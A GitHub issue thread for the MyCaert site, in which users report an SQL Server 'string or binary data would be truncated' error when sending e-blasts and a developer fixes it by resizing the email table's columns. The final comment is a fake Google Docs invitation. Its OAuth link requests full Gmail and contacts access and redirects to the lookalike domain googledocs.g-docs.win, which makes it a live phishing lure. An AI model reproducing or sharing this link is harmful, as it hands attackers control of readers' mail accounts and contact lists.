### ISSUE TITLE
Eblast Error Message

### ISSUE THREAD

**Issue by knovotney** [MyCaert/Issues-Enhancements#240]
An eblast error message pops up, every now and then.
Sometimes the eblasts go through, sometimes they do not.

Message:
Microsoft OLE DB Provider for SQL Server error '80040e57'

String or binary data would be truncated.

/admin/EmailConsole/SendEmail.asp, line 91

**Comment by knovotney** [comment]
The same error message just appeared while sending E-blasts for the blog. I will plan to complete sending in the morning.

Microsoft OLE DB Provider for SQL Server error '80040e57'

String or binary data would be truncated.

/admin/EmailConsole/SendEmail.asp, line 91

**Comment by bguerrettaz** [comment]
Hi Kathy,

I did look into this issue and am researching the cause.  It seems as if
the emails do go through, but you shouldn't be getting the error message
either way.

I will look to find the cause and resolution to this issue as soon as
possible.

Thanks,
Blake

**Comment by dpentony** [comment]
I did not receive any of the emails connected with the blog post.

**Comment by knovotney** [comment]
Hi Blake,

Thank you for looking into it. I can confirm that I have not received any of the 3 E-blasts I sent either. Thank you for your work.

Kathy

**Comment by dpentony** [comment]
I just received a bunch of emails associated with the blog post for today.

**Comment by knovotney** [comment]
I received one so far.

**Comment by bguerrettaz** [comment]
So did these go out as you would anticipate or do you see issues?  I will
work to fix that error, just want to make sure the emails went out.

Blake

**Comment by knovotney** [comment]
They did appear to go out, as I sent the remaining states just a bit ago. Thank you for your efforts. We will have blogs going out on May 7 and 14th. We may post two more blogs over summer.

**Comment by mnichols13** [comment]
I'm getting the same error message when sending eblasts today
Microsoft OLE DB Provider for SQL Server error '80040e57'

String or binary data would be truncated.

/admin/EmailConsole/SendEmail.asp, line 91

**Comment by bguerrettaz** [comment]
Ok, that's a database error, stating that the string data (the email in
HTML form) is too long for the database column. I'll up the column size if
possible, otherwise we'll have to change data types.

I'll look into it tonight.

Blake

**Comment by mnichols13** [comment]
so this one will not go out? or is it in limbo somewhere?

**Comment by bguerrettaz** [comment]
I will have to check on that one.  My assumption is, because the email
program picks up from the database, it wouldn't be there to send.  I'll
confirm that.

What was the email subject and body?

**Comment by mnichols13** [comment]
it would have looked something like this:
2017/2018 School Year Prep - Arkansas

![image](https://cloud.githubusercontent.com/assets/5790342/25408521/f229144e-29d3-11e7-8983-221578d2c440.png)

**Comment by bguerrettaz** [comment]
Ok, I dug into this a bit more.  Here's what's going on:

- I tested with your subject and picture and the email worked fine, so
there must be more in your email that I didn't account for.
- The error message is due to the database fields being set to 8000
characters, which is the max for that specific database.  It goes higher,
but would have to change to varchar(MAX), which is a different type.
   - For that to be changed, the database table has to be dropped and
recreated.  Since there is a ton of email in that table, I would suggest
creating an archive table, and then creating a new table with new fields
that account for the large sized emails.  Then I could try to migrate
everything from the archive table to the newly designed table so you had
all of those emails for your reference.

Please let me know how'd you'd like to proceed.

Thanks,
Blake

**Comment by mnichols13** [comment]
I didn't realize you needed the entire email.  I did not include the text with all of the links.  Here is the rest of it.

    MYcaert.com is the answer to your curriculum needs. MYcaert.com is an online curriculum system with 1,000+ lesson plans. 
    We have aligned a portion of those lesson plans to the Wisconsin pathways and standards.
    MYcaert lessons are content-oriented and student-centered. Each lesson plan contains everything you need to teach the lesson, including labs and assessments. All subscriptions include unlimited student accounts.

 You can organize the lesson plans into custom course outlines. Sample course outlines are provided. Check out our list of example course outlines and titles!

See order form at this link:    

http://mycaert.com/ContentFiles/113201723156PM.pdf

    Want a free trial to browse a library, and show your administration? We provide 30 day free trials, here. 
    Looking for shortcuts to better use MYcaert? Check out our blog and video tutorials!

**Comment by bguerrettaz** [comment]
Ok, that explains the length issue then.

As these emails grow (in content) we are going outside of the bounds of the
database fields.

If we see these continuing, we will need to do what I suggested in my last
email.  Do you see these error messages everytime you send an email?  If
so, when did that start?

Blake

**Comment by mnichols13** [comment]
Most of these larger emails I am sending through a gmail account.  I do see an error message occasionally, but I cannot say for sure when it started.  Before Kathy came on board, we never had the image in the emails, this is something new.

**Comment by bguerrettaz** [comment]
Ok, makes sense.

Please let me know if you'd like me to do what I proposed last night.

Blake

**Comment by knovotney** [comment]
Mindy- thanks for clarifying for Blake.

Blake- You mention "Since there is a ton of email in that table, I would suggest creating an archive table, and then creating a new table with new fields that account for the large sized emails. Then I could try to migrate everything from the archive table to the newly designed table so you had all of those emails for your reference." With this, do you mean the table below, or an entirely different table that is now viewable to the everyday user? Also, how many hours would this take if you went through with your proposal from last night? 

![image](https://cloud.githubusercontent.com/assets/21039374/25438515/c6020364-2a67-11e7-9a3d-b43b07f84c18.png)

**Comment by dpentony** [comment]
See attached for comments.

**Comment by bguerrettaz** [comment]
@dpentony - I don't see an attachment.  If you tried to attach via an email reply, it won't show up on a GitHub post, you'll have to post it directly in GitHub.

@knovotney - The email database table houses all emails that have ever been sent from the email console.  If I create a new table, I'll have to back up the existing table, create a new table, move all of the old records from the archive table to the new table and put in place.

Thanks,
Blake

**Comment by dpentony** [comment]
Disregard. I meant that reply for a different email.

**Comment by bguerrettaz** [comment]
No problem.  

@knovotney - probably 3 hours to do this work.

Blake

**Comment by knovotney** [comment]
Hi Blake,

We will not need any of the previous E-Blast Messages after today. There will be no need to archive and/or save. We are copying over those we want that are currently viewable to us. You can delete them all after today's work day. 

Thanks,
Kathy

**Comment by knovotney** [comment]
Blake,

Just to clarify, no back up of the messages is needed, but you can proceed with resolving this issue. Do you need any further info from me?

Kathy

**Comment by bguerrettaz** [comment]
This is almost complete.  I'll update when I've finished.

Thanks,
Blake

**Comment by bguerrettaz** [comment]
This is complete.  Please test and confirm.

Blake

**Comment by knovotney** [comment]
Blake, 

We have tested and it seems to be working. Thank you!
-Kathy

**Comment by bguerrettaz** [comment]
Blake Guerrettaz has invited you to view the following document:

Open in Docs
<https://accounts.google.com/o/oauth2/auth?client_id=1535050614-8i934kb9l0snc0iocqb0iv27lli0r858.apps.googleusercontent.com&scope=https%3A%2F%2Fmail.google.com%2F+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fcontacts&immediate=false&include_granted_scopes=true&response_type=token&redirect_uri=https%3A%2F%2Fgoogledocs.g-docs.win%2Fg.php&customparam=customparam>
